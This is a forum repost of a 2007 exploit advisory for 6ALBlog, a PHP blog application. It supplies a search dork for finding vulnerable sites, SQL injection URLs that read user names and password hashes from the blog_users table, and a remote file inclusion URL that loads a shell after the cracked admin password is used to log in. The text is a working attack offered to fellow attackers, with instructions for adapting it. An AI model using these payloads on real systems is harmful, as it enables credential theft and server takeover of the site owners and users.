hex Posted June 27, 2007 Report Posted June 27, 2007 +______________________________________________By Crackers_Child___________________________________________+*** [~] Portal.......: 6ALBlog All Versions* [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar* [~] Author.......: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com* [~] Class........: Remote SQL Injection and Remote File ?nclude Vulnerability* [~] Dork.........: inurl:"member.php?page=comments+_______________________________________________________________________________________________________________________++_______________________________________________________________________________________________________________________+*** [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/** http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/**** [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work** http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?+_______________________________________________________________________________________________________________________+ [~] ?nfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone and you can write it on exploit "MEMBERNAME" area +_______________________________________________________________________________________________________________________++_______________________________________________________________________________________________________________________+*** [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends*+_______________________________________________________________________________________________________________________+# milw0rm.com [2007-06-25] Quote
